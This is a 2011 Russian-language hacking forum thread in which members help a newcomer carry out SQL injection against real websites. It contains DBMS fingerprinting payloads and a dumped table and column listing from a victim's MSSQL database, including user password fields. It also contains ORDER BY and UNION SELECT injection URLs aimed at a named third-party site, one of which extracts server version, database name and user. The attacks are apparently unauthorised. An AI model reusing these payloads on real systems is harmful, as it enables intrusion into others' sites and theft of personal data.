ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
08.06.2011, 12:57
|
|
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
Провел на форуме:
111014
Репутация:
8
|
|
Сообщение от shell_c0de
shell_c0de said:
2mix0x0 там все просто, стоит Microsoft SQL Server 2005 почитай тут
тут
и
тут
там 100500 БД... Вы правы, там все легко выводится:
DB Name: hr
Table found: sysdiagrams
Table found: Process
Table found: MLSArea
Table found: ProcessStep
Table found: FileImport
Table found: User
Table found: Theme
Table found: MLSListingImage
Table found: Agent
Table found: MLSListing
Table found: Office
Table found: Table1
Table found: Table2
Table found: ContainerModule
Table found: ListingPriceHistory
Table found: PageContainer
Table found: Portlet
Table found: OpenHouse
Table found: PortletProperty
Table found: ModuleProperty
Table found: PropertyType
Table found: Page
Table found: FeaturedListing
Table found: UserSearch
Table found: FileImportColumn
Table found: ListingType
Table found: Document
Table found: MLSListingLink
Table found: WebLog
Table found: Container
Table found: OpenHouseTemp
Table found: Module
Table found: State
Table found: Website
hr.User
Column found: AddedByID
Column found: AddedDt
Column found: EmailAddress
Column found: FirstName
Column found: HomePhone
Column found: LastName
Column found: MobilePhone
Column found: Password
Column found: SysAdminFl
Column found: UpdatedByID
Column found: UpdatedDt
Column found: UserID
Column found: UserName
Column found: UserStatus
Column found: WorkPhone
От меня ++++++++ и большое thanks за науку.
|
|
|
08.06.2011, 18:01
|
|
Новичок
Регистрация: 13.04.2010
Сообщений: 0
Провел на форуме:
1350
Репутация:
0
|
|
2 вопроса:
1 - имеется сайт, в нем Возможно есть sql inj
пишу в урл 49-1 возвращается 48 страница при написании ' выводится пустая страница
как осуществить подсчет полей и дамп базы в таких условиях? и уязвим вообще этот сайт?
2 - как определить mysql от mssql и oracle ? кроме символов комментариев?
|
|
|
|
08.06.2011, 18:47
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме:
2268
Репутация:
0
|
|
Сообщение от foozzi
foozzi said:
2 вопроса:
1 - имеется сайт, в нем
Возможно
есть sql inj
пишу в урл 49-1 возвращается 48 страница при написании
'
выводится пустая страница
как осуществить подсчет полей и дамп базы в таких условиях? и уязвим вообще этот сайт?
2 - как определить mysql от mssql и oracle ? кроме символов комментариев?
1. Если параметр полностью передаться в базу, то как обычно. Обычно числовые параметры не обрамляются кавычками, из за этого при проведении инъекции возможно исключить этот символ. Если нет - выложи линк. Всё надо смотреть, так же возможно из переменной удаляются символы(A-Za-z), специальные функции - здесь телепатов нет.
2. Встроенными функциями, синтаксисом подзапросов, сравнения - потом БД гораздо больше.
|
|
|
|
08.06.2011, 19:08
|
|
Новичок
Регистрация: 04.11.2004
Сообщений: 5
Провел на форуме:
4512
Репутация:
0
|
|
Сообщение от foozzi
foozzi said:
как осуществить подсчет полей и дамп базы в таких условиях?
"id=48 order by 1" например так.
p.s.: давай ссылку. это тебе не фиши по факингу
|
|
|
|
08.06.2011, 19:09
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281
Репутация:
1177
|
|
Сообщение от foozzi
foozzi said:
2 - как определить mysql от mssql и oracle ? кроме символов комментариев?
Код:
Code:
id=1+procedure+analyse()
id=1+and+concat_ws(1)=1
id=1+and+connection_id()=connection_id()
MSSQL
Код:
Code:
id=1+and+len(@@version)=len(@@version)
id=1+and+(@@TEXTSIZE>@@LANGID)
PostgerSQL
Код:
Code:
id=1+and+1=1::int
id=1+and+pg_backend_pid()=pg_backend_pid()
id=1+and+5432=inet_server_port()
Access
Код:
Code:
id=1+and+1=StrConv(1,1)
id=1+and+Sgn(1)=Sgn(1)
Oracle
Код:
Code:
id=1+and+to_char(22)=to_char(2)||to_char(2)
id=1+and+instr4(1,1,1,1)=1
id=1+and+rownum=rownum
Взято отсюда: https://rdot.org/forum/showpost.php?p=695&postcount=1
|
|
|
|
08.06.2011, 19:53
|
|
Новичок
Регистрация: 13.04.2010
Сообщений: 0
Провел на форуме:
1350
Репутация:
0
|
|
Сообщение от M_script
M_script said:
"id=48 order by 1" например так.
p.s.: давай ссылку. это тебе не фиши по факингу
вот это убожество _http://www.cms.it/prodotti.php?lang=eng'&pc=49
(практикуюсь)
|
|
|
|
08.06.2011, 20:07
|
|
Постоянный
Регистрация: 29.02.2008
Сообщений: 935
Провел на форуме:
7007866
Репутация:
1914
|
|
Сообщение от foozzi
foozzi said:
вот это убожество _http://www.cms.it/prodotti.php?lang=eng'&pc=49
(практикуюсь)
Код:
Code:
http://www.cms.it/prodotti.php?lang=eng&pc=49 order by 64-- -
http://www.cms.it/prodotti.php?lang=eng&pc=49 order by 65-- -
Код:
Code:
http://www.cms.it/prodotti.php?lang=eng&pc=(49)union/**/select(1),2,3,4,version(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64-- -
вывод внизу
|
|
|
|
08.06.2011, 20:34
|
|
Новичок
Регистрация: 13.04.2010
Сообщений: 0
Провел на форуме:
1350
Репутация:
0
|
|
Сообщение от AlexV
AlexV said:
Код:
Code:
http://www.cms.it/prodotti.php?lang=eng&pc=49 order by 64-- -
http://www.cms.it/prodotti.php?lang=eng&pc=49 order by 65-- -
Код:
Code:
http://www.cms.it/prodotti.php?lang=eng&pc=(49)union/**/select(1),2,3,4,version(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64-- -
вывод внизу Вывода не нашол, да и еще вопрос, почему ты 49 и 1 в скобки заключил?
|
|
|
|
08.06.2011, 20:35
|
|
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
Провел на форуме:
111014
Репутация:
8
|
|
Сообщение от foozzi
foozzi said:
Вывода не нашол, да и еще вопрос, почему ты 49 и 1 в скобки заключил?
http://www.cms.it/prodotti.php?lang=eng&pc=-49+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,ver sion(),database(),user(),@@version_compile_os),10, 11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 ,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,4 4,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60, 61,62,63,64+--+
Сейчас видишь?
В админку все равно не попасть
|
|
|
|
08.06.2011, 20:39
|
|
Новичок
Регистрация: 13.04.2010
Сообщений: 0
Провел на форуме:
1350
Репутация:
0
|
|
http://h1813090.stratoserver.net/files/share/8_6_2011/sraB8DgFlEWFYHrOQR1opw.jpg
знаю я sqlhelperom уже просканил базу там даж паролей нет, просто руками же интересней
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
